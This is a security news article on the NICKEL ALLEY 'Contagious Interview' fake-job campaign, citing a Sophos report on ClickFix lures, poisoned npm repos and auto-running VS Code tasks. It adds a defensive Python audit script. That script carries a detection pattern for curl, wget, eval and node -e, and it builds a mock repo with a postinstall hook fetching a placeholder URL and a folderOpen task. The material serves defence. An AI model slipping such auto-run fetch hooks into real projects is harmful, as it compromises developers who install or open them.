Astra Byte Sync GitHub account | Image: Sophos
In a digital era where remote work and freelance gigs are the norm, a sophisticated threat group is proving that your next “dream job” could actually be a nightmare. NICKEL ALLEY, a threat group operating on behalf of the North Korean government, has intensified its “Contagious Interview” campaigns, specifically targeting tech professionals with a blend of high-end social engineering and clever technical exploits.
According to a recent report from Sophos Counter Threat Unit (CTU) researchers, this group isn't just looking for data; they are after your corporate access and your cryptocurrency.
The group's strategy is built on three pillars of victimology: targeting freelance workers on platforms like Upwork and Fiverr, selecting high-value individuals on LinkedIn, and poisoning npm repositories.
To build trust, NICKEL ALLEY creates elaborate fake LinkedIn company pages and engages in professional “rapport building” before ever dropping a malicious link.
As the Sophos report notes:
“The group notoriously targets professionals in the technology sector by advertising fake job opportunities, deceiving prospective candidates through a fake job interview process, and ultimately delivering malware.”
Once a candidate is hooked, the “interview” moves to a technical assessment. Since mid-2025, the group has leaned heavily on the ‘ClickFix’ tactic. In this scenario, a victim is directed to a fake assessment website that intentionally displays an error.
To “fix” the error and continue the interview, the victim is instructed to run a command locally. Rather than fixing a bug, this command initiates an infection chain that delivers the PyLangGhost RAT (Remote Access Trojan). This malware is a powerhouse, capable of:
- File exfiltration and arbitrary command execution.
- System profiling and gathering browser credentials/cookies.
- Targeting Chrome cryptocurrency wallet data.
NICKEL ALLEY's ingenuity shines in how they exploit the very tools developers use daily.
Attackers often convince victims to clone a GitHub repository for a “coding test”. One such account, astrasbytesyncs, masqueraded as a blockchain solutions company. By running standard commands like npm install and npm start, victims unknowingly execute code that fetches malware like BeaverTail.
In late 2025, the group began using .vscode/tasks.json configuration files. These are legitimate features used for automation, but NICKEL ALLEY configured them to run malicious scripts the moment a folder is opened in VS Code.
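As an added illustration, not code from the Sophos report or from the repository mentioned above, here is a defender-side audit that checks a cloned project for the two auto-run mechanisms just described: npm lifecycle scripts that reach out to the network or evaluate code, and a .vscode/tasks.json task configured to run on folderOpen. The sample repository it builds is constructed for the demo and uses a placeholder URL; it assumes tasks.json is plain JSON without comments.

```python
import json
import os
import re
import tempfile

# npm lifecycle hooks that run implicitly during `npm install`, plus `start`,
# the script the coding-test lure tells the victim to run.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "start")
# Remote-fetch or dynamic-evaluation patterns inside a script string.
SUSPICIOUS = re.compile(
    r"(\bcurl\b|\bwget\b|Invoke-WebRequest|\beval\b|node\s+-e|base64|https?://)", re.I)


def audit_repo(root):
    """Return (file, reason) findings for auto-run hooks in a cloned repo."""
    findings = []
    pkg = os.path.join(root, "package.json")
    if os.path.isfile(pkg):
        with open(pkg, encoding="utf-8") as f:
            scripts = json.load(f).get("scripts", {})
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook, "")
            if SUSPICIOUS.search(cmd):
                findings.append(("package.json", f"{hook}: {cmd}"))
    tasks = os.path.join(root, ".vscode", "tasks.json")
    if os.path.isfile(tasks):  # assumption: plain JSON, no JSONC comments
        with open(tasks, encoding="utf-8") as f:
            data = json.load(f)
        for task in data.get("tasks", []):
            # "runOn": "folderOpen" makes VS Code launch the task as soon as
            # the folder is opened, if automatic tasks are allowed.
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append((".vscode/tasks.json",
                                 f"folderOpen task {task.get('label')!r}: {task.get('command')}"))
    return findings


def build_sample_repo():
    """Write a constructed repo (placeholder URL, not real IoCs) to a temp dir."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as f:
        json.dump({"name": "coding-test", "scripts": {
            "postinstall": "node -e \"require('https').get('https://example.invalid/s')\"",
            "start": "node index.js"}}, f)
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as f:
        json.dump({"version": "2.0.0", "tasks": [{"label": "setup", "type": "shell",
            "command": "node setup.js", "runOptions": {"runOn": "folderOpen"}}]}, f)
    return root
```

Calling audit_repo(build_sample_repo()) reports the postinstall hook and the folderOpen task while leaving the harmless start script alone; pointing audit_repo at a freshly cloned directory before running npm install or opening it in VS Code gives the same check on real input.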
NICKEL ALLEY's persistence suggests they are looking for more than just a quick payday. Sophos researchers warn that:
“While these attacks appear to have a central goal of cryptocurrency theft, the threat group has demonstrated its intention to use initial access for further supply chain compromise or corporate espionage.”
What should organizations do?
- Monitor Command Execution: Look for suspicious combinations of curl, PowerShell, and executables launching from the %TEMP% directory.
- Watch Node.js Traffic: Monitor network traffic spawning from Node.js processes, as this often indicates malware retrieval.
- Report Social Lures: Encourage employees to flag unsolicited recruitment contact on social media that seems too good to be true.